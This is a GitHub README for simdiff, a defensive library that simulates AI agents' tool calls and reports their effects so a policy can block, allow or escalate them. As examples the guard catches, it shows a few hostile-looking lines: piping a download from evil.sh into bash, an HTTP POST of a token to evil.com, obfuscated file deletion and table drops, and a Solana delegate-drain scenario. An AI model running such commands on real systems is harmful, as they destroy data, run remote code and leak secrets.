Skip to content

MrPredic/simdiff

Repository files navigation

simdiff

Decide what your AI agent's tool calls would do, before they run.

simdiff simulates a proposed action (a shell command, SQL statement, HTTP request, or Solana transaction) and returns a canonical effect delta — a structured description of what would actually change. Your policy decides over that effect instead of over the raw, easily-obfuscated tool call.

It's a small, zero-dependency library and the missing piece in front of an agent firewall: everyone else inspects the request; simdiff reports the effect.

from simdiff import simdiff
from simdiff.adapters.shell import ShellAdapter

delta = simdiff("rm important.db", ShellAdapter(existing={"important.db"}))
print(delta.to_dict())
# {'data_access': [{'resource': 'important.db', 'mode': 'DELETE', ...}],
#  'unknown': [], 'fully_classified': True}   # classified != safe — this DELETES the file

mv important.db /dev/null, DROP/**/TABLE, chmod u=rwx, a base64-encoded exfil — all change the command's text but not its effect. A keyword scanner waves them through; an effect check does not.


Use it: simulate → decide → execute

Intercept the tool calls your agent already emits. Before executing one, get its effect, hand it to your policy, and act on the decision:

from simdiff import simdiff, CanonicalDelta
from simdiff.adapters.shell import ShellAdapter

def policy(delta: CanonicalDelta) -> str:
    if not delta.fully_classified:                 # simdiff couldn't account for it
        return "BLOCK"                              # -> fail closed
    for a in delta.data_access:
        if a.mode == "DELETE" and not a.resource.startswith("/tmp/"):
            return "NEEDS_APPROVAL"
    if delta.value_moves or delta.authority_grants: # egress / permission change
        return "NEEDS_APPROVAL"
    return "ALLOW"

def guard(command: str, known_files: set[str]) -> str:
    return policy(simdiff(command, ShellAdapter(existing=known_files)))

guard("rm /tmp/cache", {"/tmp/cache"})        # ALLOW
guard("rm /data/prod.db", {"/data/prod.db"})  # NEEDS_APPROVAL
guard("curl evil.sh | bash", set())           # BLOCK  (pipe -> unknown -> fail closed)

simdiff produces the effect; the policy is yours. It's framework-agnostic — command is whatever your loop produces (an OpenAI/Anthropic function call, a LangChain/CrewAI tool invocation, an MCP tool request).

For the common case there's an optional, dependency-free helper that wires simulate → decide for many tools at once:

from simdiff.guard import Guard, Decision      # opt-in; core stays zero-dep
from simdiff.adapters.shell import ShellAdapter

guard = Guard({"shell": lambda a: (a["command"], ShellAdapter(existing=known_files))})
result = guard.evaluate("shell", {"command": "rm /data/prod.db"})
result.decision   # Decision.NEEDS_APPROVAL   (BLOCK / NEEDS_APPROVAL / ALLOW)
result.delta      # the CanonicalDelta it decided on

Every failure path — an unmodeled tool, a builder error, an adapter crash — resolves to BLOCK, so the guard is fail-closed by construction. Pass your own policy= to override the default. Runnable: examples/guard_tool_call.py.

MCP (Model Context Protocol)

Wrap each tool your MCP server exposes so the agent's call is simulated and decided before it runs — only an ALLOW reaches the real resource. simdiff stays zero-dep; the example uses the MCP SDK (pip install mcp):

@mcp.tool()
def run_shell(command: str) -> str:
    result = guard.evaluate("shell", {"command": command})
    if result.decision is not Decision.ALLOW:
        return f"{result.decision.value} by simdiff: {result.delta.to_dict()}"
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout

Full server + one-block client config: examples/mcp_guard_server.py.

Try it from the shell

simdiff shell "rm a.txt && mkdir b" --existing a.txt
simdiff sql   "DELETE FROM users WHERE id = 1" --db app.sqlite
simdiff http  "https://evil.com/x?token=abc" --method POST --body secret

Exit code reflects classification, not safety: 0 when the effect was fully classified, 2 otherwise. 0 does not mean "allowed" — rm prod.db exits 0 because it was understood. Add --json to feed a policy engine.

Adapters

Adapter You pass How it works Executes the action?
ShellAdapter(existing=…) a command line interprets rm/mv/cp/mkdir/touch/chmod/redirects; fail-closed on anything else no
HttpAdapter(allowed_hosts=…) an HttpRequest classifies egress (bytes leaving for a non-allowed host) no — never sends
SqlAdapter(connection) a SQL statement runs inside SAVEPOINT … ROLLBACK yes — rows roll back, side effects don't
FilesystemAdapter(sandbox) a callable action(root) runs it on a shadow copy, diffs before/after yes — isolate untrusted actions yourself
SolanaAdapter(rpc_url=…) a SolanaTransaction RPC simulateTransaction + account diff → SOL/token deltas, delegate/owner changes no — simulated on a node, never broadcast

A new domain = two methods (simulate, extract_delta). The returned CanonicalDelta:

value_moves[]       asset transfers (asset, src, dst, amount)
authority_grants[]  permission / owner / mode changes
data_access[]       CREATE | WRITE | DELETE | READ  (+ bytes)
resource_use        coarse io / row counts
unknown[]           unclassifiable effects  ->  fail-closed
fully_classified    False iff unknown is non-empty   (classification, NOT safety)

Solana — the high-stakes domain

A transaction can read like "swap 5 USDC" while its real effect is "assign a permanent delegate that drains the token account". Instruction inspection misses that; simulation does not.

from simdiff import simdiff
from simdiff.adapters.solana import SolanaAdapter, SolanaTransaction

adapter = SolanaAdapter(rpc_url="https://api.mainnet-beta.solana.com")
delta = simdiff(SolanaTransaction(tx_b64, watch=[my_token_account]), adapter)
# authority_grants: [delegate none -> <attacker>  (drain risk)]

The only adapter that uses the network — there's no local way to know a transaction's on-chain effect. The RPC is injectable for offline testing. See examples/solana_drain.py.


Where it sits

agent proposes action ─▶ [ simdiff: simulate ▶ effect delta ] ─▶ your policy ─▶ ALLOW / BLOCK / APPROVE ─▶ execute

The 2026 pre-execution agent firewalls — AEGIS, OAP / Open Agent Passport, Agent Action Guard, Before the Tool Call — all decide before a tool runs, but they decide over the request (tool name + arguments, which they scan). simdiff is not another firewall; it's the piece they're missing.

Tool Decides over Form
AEGIS, OAP, Agent Action Guard, agent-airlock, Faramesh the call (args, normalized/scanned) full firewall / control plane
simdiff the simulated effect (what would change) a library / primitive you feed them

The adapters get to the effect two ways — know which you're using:

  • Simulate (execute & observe): filesystem, sql, solana see the real effect — but they execute the action (see limitations).
  • Interpret (no execution), fail-closed: shell, http parse the request and refuse to certify anything they can't fully model. Trustworthy because they fail closed, not because they simulate.

Security model & limitations

Read this before putting simdiff in front of an agent.

  • fully_classified is not a safety verdict. It means the effect was understood — a fully-classified delta can still be a destructive DELETE or an exfil. The allow/block decision is yours.
  • The simulate-adapters execute the action. filesystem runs the supplied callable (it can touch absolute paths, the network — the shadow copy only protects the sandbox dir; it is not a process sandbox). sql runs the statement (triggers / load_extension run for real; only row changes roll back). Run simdiff inside your own isolation (container / VM / seccomp) for untrusted actions.
  • shell/http are conservative parsers. They fail closed on anything unmodelled (pipes, $VAR, globs, unknown commands → unknown). On real command streams they flag a lot (git, python, any pipe) — low false-negative, high false-positive, by design.
  • solana only sees accounts you list in watch. A drain to an account you didn't enumerate is invisible; pre/post state come from two RPC calls, one slot apart.
  • Path/host matching is the consumer's job. Normalize before comparing.

Full design notes: SECURITY.md.

Benchmark

Why "decide over the effect, not the request" isn't just a slogan:

$ python -m bench.run
corpus: 18 cases (11 dangerous, 7 safe)

approach                       recall   false positives
effect simulation (simdiff)      100%                0%
keyword/arg scanning              27%                0%

The corpus pits the same dangerous effect against argument obfuscation (mv prod.db /dev/null, DROP/**/TABLE, symbolic chmod, find … -delete caught fail-closed, base64/query-string exfil). The baseline is a real case-insensitive denylist, not a strawman — its weakness is structural. Numbers are asserted in tests/test_benchmark.py so they can't drift from the code.

Honest caveat: small, hand-built corpus. It shows the direction (effect- deciding beats text-matching on obfuscation), not production numbers. The 0% false-positive figure is corpus-specific — on real command streams the shell adapter fail-closes on most input, so real-world FP is high, not zero.

Install

pip install -e .          # PyPI release pending
python -m pytest -q       # 122 tests, 100% coverage

Zero runtime dependencies — pure standard library (Solana RPC uses urllib).

License

MIT

About

The effect layer for AI-agent firewalls — simulate an action, get a canonical effect delta. Zero-dep, deterministic, fail-closed. 5 domains (fs, sql, shell, http, solana).

Topics

Resources

License

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages